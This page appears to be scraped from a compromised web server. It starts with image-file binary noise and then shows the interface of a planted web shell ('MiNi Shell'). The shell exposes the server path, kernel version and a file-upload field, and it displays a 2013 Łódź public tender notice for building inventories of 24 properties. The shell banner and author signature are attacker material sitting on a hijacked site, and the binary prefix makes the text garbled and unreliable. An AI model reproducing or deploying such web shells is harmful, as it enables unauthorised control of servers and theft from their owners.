JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131108/236321-N-2013.html

<p class="kh_header"><b>Łódź: Inwentaryzacje architektoniczno - budowlane nieruchomości</b><br>
<b>Numer ogłoszenia: 236321 - 2013; data zamieszczenia: 08.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobów Komunalnych Łódź-Górna , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 684 52 19, faks 42 684 52 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.gorna.azk.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Inwentaryzacje architektoniczno - budowlane nieruchomości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi polegające na opracowaniu dokumentacji - inwentaryzacji architektoniczno - budowlanej w 24 nieruchomościach w Łodzi w podziale na 13 części:

CZĘŚĆ I - INWENTARYZACJE NIERUCHOMOŚCI MIESZKALNYCH WIELORODZINNYCH  
                  I INNYCH NIŻ MIESZKALNE                                             
            
1	Stocka 6 -	mieszkalny	1805,00m3, gospodarczy 90,00m3,	
Część 1 ogółem:	1895,00m3.

CZĘŚĆ II - INWENTARYZACJE NIERUCHOMOŚCI MIESZKALNYCH WIELORODZINNYCH 
                    I INNYCH NIŻ MIESZKALNE 
                      
2. 	Lokatorska 10 -	mieszkalny	2232,00m3, gospodarczy	700,00m3,	
3.	Krucza 5 -mieszkalny	1759,00m3,	mieszkalny	2429,00m3,	
gospodarczy	 238,00m3,	
Część 2 ogółem:	7358,00m3.


CZĘŚĆ III - INWENTARYZACJE NIERUCHOMOŚCI MIESZKALNYCH 
                     WIELORODZINNYCH I INNYCH NIŻ MIESZKALNE                 
4.	Łomżyńska 5 -	mieszkalny	1852,00m3, gospodarczy	212,16m3	
5.	Czerwona 4	 - mieszkalny	3000,00m3, mieszkalny	398,00m3	
Część 3 ogółem:	5462,16m3.

CZĘŚĆ IV -INWENTARYZACJE NIERUCHOMOŚCI MIESZKALNYCH WIELORODZINNYCH 
                   I INNYCH NIŻ MIESZKALNE                                             
6.	Senatorska 44 - mieszkalny	2546,00m3,	gospodarczy 123,00m3,	
7.	Krucza 19 - mieszkalny	5509,00m3,	gospodarczy	384,00m3,	
Część 4 ogółem:	8562,00m3.

CZĘŚĆ V - INWENTARYZACJE NIERUCHOMOŚCI MIESZKALNYCH WIELORODZINNYCH 
                   I INNYCH  NIŻ MIESZKALNE                                             
8.	Browarna 18 - mieszkalny	601,32m3,
9.	Przybyszewskiego 11 - mieszkalny	1359,00m3, mieszkalny	1394,00m3,	
	garaż	137,86m3, garaż	85,00m3, gospodarczy	107,00m3,	
	gospodarczy 139,60m3,	użytkowy	106,00m3,	
Część 5 ogółem:	3929,78m3.

CZĘŚĆ VI - INWENTARYZACJE NIERUCHOMOŚCI MIESZKALNYCH 
                     WIELORODZINNYCH I INNYCH NIŻ MIESZKALNE
                

10.	Zygmuntowska 12 - mieszkalny 1039,50m3,	
11.	Przybyszewskiego 3 - mieszkalny	3379,00m3,	gospodarczy 162,00m3,	
	garaż	70,64m3,	
Część 6 ogółem:	4651,14m3.

CZĘŚĆ VII - INWENTARYZACJE NIERUCHOMOŚCI MIESZKALNYCH 
                      WIELORODZINNYCH I INNYCH NIŻ MIESZKALNE                                             
                
12.	Rogozińskiego 6a	- mieszkalny 2180,00m3,
13.	Rzgowska 2a - mieszkalny 4383,00m3, mieszkalny 2028,00m3,	
	gospodarczy 514,00m3,	
   Część 7 ogółem:9105,00m3.

CZĘŚĆ VIII - INWENTARYZACJE NIERUCHOMOŚCI MIESZKALNYCH 
WIELORODZINNYCH I INNYCH NIŻ MIESZKALNE                                             
                 
14.	Szara 18 - mieszkalny	2444,75m3,	
15.	Krucza 31 - mieszkalny	1233,00m3, 	
Część 8 ogółem:3677,75m3.

CZĘŚĆ IX - INWENTARYZACJE NIERUCHOMOŚCI MIESZKALNYCH 
       WIELORODZINNYCH I INNYCH NIŻ MIESZKALNE                                             
  

16.	Rzgowska 33a - mieszkalny	3289,00m3,
17.	Krucza 33 - mieszkalny	1608,00m3,
  Część 9 ogółem: 4897,00m3.

CZĘŚĆ X- INWENTARYZACJE NIERUCHOMOŚCI MIESZKALNYCH WIELORODZINNYCH 
                  I INNYCH NIŻ MIESZKALNE                                             
18.	Krucza 35 - mieszkalny	849,00m3, gospodarczy	263,00m3,	
19.	Kilińskiego 205 - mieszkalny 3346,00m3, mieszkalny 1137,00m3,	
	mieszkalny	823,00m3, gospodarczy	658,00m3,	
 Część 10 ogółem:7076,00m3.

CZĘŚĆ XI - INWENTARYZACJE NIERUCHOMOŚCI MIESZKALNYCH 
      WIELORODZINNYCH I INNYCH NIŻ MIESZKALNE                                             
20.	Sanocka 22	- mieszkalny 22135,00m3,
  Część 11 ogółem:22135,00m3.

CZĘŚĆ XII - INWENTARYZACJE NIERUCHOMOŚCI MIESZKALNYCH                            
   WIELORODZINNYCH I INNYCH NIŻ MIESZKALNE
                                            

21.	Rogozińskiego 13a - mieszkalny 6551,00m3,
22.	Wólczańska 237 -mieszkalny	2452,00m3,
 Część 12 ogółem:9003,00m3.

CZĘŚĆ XIII - INWENTARYZACJE NIERUCHOMOŚCI MIESZKALNYCH 
      WIELORODZINNYCH I INNYCH NIŻ MIESZKALNE                                             
23.	Słowiańska 26 - mieszkalny	3754,00m3, gospodarczy 239,00m3,	
24.	Zjednoczenia 22 - mieszkalny	1112,00m3,
    Część 13 ogółem:5105,00m3.
2. W ramach przedmiotu zamówienia Wykonawca zobowiązany będzie do opracowania dokumentacji - inwentaryzacji architektoniczno - budowlanej nieruchomości w zakresie:
a)	wykonania planów sytuacyjnych terenu, na którym usytuowane są obiekty,
b)	wykonania pomiarów inwentaryzacyjnych z natury,
c)	wykonania opisu technicznego budynku z uwzględnieniem jego konstrukcji, elementów    
            wykończeniowych i instalacji,
d)	wykonania rzutów poszczególnych kondygnacji i przekroju pionowego obiektu,
e)	wykonania zestawienia powierzchni:
   - poszczególnych lokali,
   - pomieszczeń przynależnych,
   - części wspólnych nieruchomości,
      f)   określenia udziałów lokali mieszkalnych i lokali o przeznaczeniu innym niż mieszkalne w 
            powierzchni wspólnej nieruchomości,
g)	wykonania zestawienia powierzchni użytkowych wszystkich lokali, pomieszczeń 
      przynależnych, części wspólnych oraz innych elementów budynku wraz z określeniem 
      udziałów w powierzchni wspólnej, 
h)	wykonania opisu technicznego określającego samodzielność lokali (opisu samodzielności 
      każdego lokalu). W przypadku lokalu niesamodzielnego określić warunki
      techniczne /określenie robót budowlanych/ dla uzyskania samodzielności lokalu.
 i)   ustalenia położenia pomieszczeń przynależnych (w szczególności piwnicy/piwnic do lokali 
      mieszkalnych i użytkowych oraz ziwentaryzowania ich wraz z uwzględnieniem pozostałej 
      powierzchni zgodnie ze stanem faktycznym i prawnym, w szczególności jako części 
      wspólnych budynku lub lokali       
3. Usługi w zakresie inwentaryzacji architektoniczno - budowlanej  należy wykonać  zgodnie z:
a)	Specyfikacją techniczną określającą szczegółowo przedmiot zamówienia stanowiącą zał. nr 7 do SIWZ,
b)	wymaganiami technicznymi ujętymi w normach państwowych i innych rozporządzeniach.
 4. Zamawiający w przedmiocie zamówienia będzie wymagał od Wykonawcy:
 4.1.prowadzenia usługi pod ścisłym nadzorem osób uprawnionych,  posiadających uprawnienia 
       uprawniające do projektowania w specjalności:
      a)  architektonicznej  lub konstrukcyjno - budowlanej,
      b)  odpowiedzialności za wady fizyczne i prawne wykonanego przedmiotu zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego w art. 22 ust. 1 
     Ustawy, który dotyczy: 
  a)  posiadania wiedzy i doświadczenia;
     Zamawiający żąda udokumentowania posiadanej wiedzy i doświadczenia.Wykonawca powinien 
      wykazać w zał. nr 2 do SIWZ  że wykonał  należycie w okresie ostatnich trzech lat 
      przed upływem składania terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
      krótszy - w tym okresie - usługi podobne do usług objętych przedmiotem zamówienia i o 
      wartości porównywalnej do składanej oferty wraz z dokumentami potwierdzającymi, że wykazane 
      przez Wykonawcę usługi zostały wykonane lub są  wykonywane należycie.  Za usługę podobną do 
      usług objętych przedmiotem niniejszego postępowania Zamawiający uznaje wykonanie 
      inwentaryzacji architektoniczno - budowlanej nieruchomości.
  Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez Wykonawców 
  dokumentów na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego w art. 22 ust. 1 
     Ustawy, który dotyczy:
 a)  dysponowania osobami zdolnymi do wykonania zamówienia;
    Zamawiający żąda od Wykonawcy wykazania  w zał. nr 3 do SIWZ  wykazu osób, które będą 
     uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie 
     przedmiotowych usług. Zamawiający wymaga, aby osoby, które będą uczestniczyć w 
     wykonywaniu zamówienia posiadały:
     -  uprawnienia budowlane - zgodnie z ustawą z dnia 07.07.1994 r. Prawo Budowlane, z późn. zm.,  
        uprawniające do projektowania w specjalności: architektonicznej  lub konstrukcyjno - 
        budowlanej - 1 osoba,
     -  aktualne zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa, 
    wraz informacjami na temat ich kwalifikacji zawodowych i doświadczenia oraz informacją o 
    podstawie do dysponowania tymi osobami, a także  z załączeniem   tych  dokumentów 
     (uprawnień i aktualnych zaświadczeń). W przypadku kiedy wymieniona osoba nie jest 
     pracownikiem Wykonawcy do oferty należy załączyć oświadczenia tej osoby, że będzie w 
     dyspozycji Wykonawcy przy wykonywaniu zamówienia. 
   Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych  przez Wykonawców 
   dokumentów i oświadczeń na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gorna.azk.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> AZK Łódź - Górna, Łódź - Górna, 93-129 Łódź, ul. Lubelska 9/11, pokój 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2013 godzina 10:00, miejsce: AZK Łódź - Górna, Łódź - Górna, 93-129 Łódź, ul. Lubelska 9/11, pokój 6 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com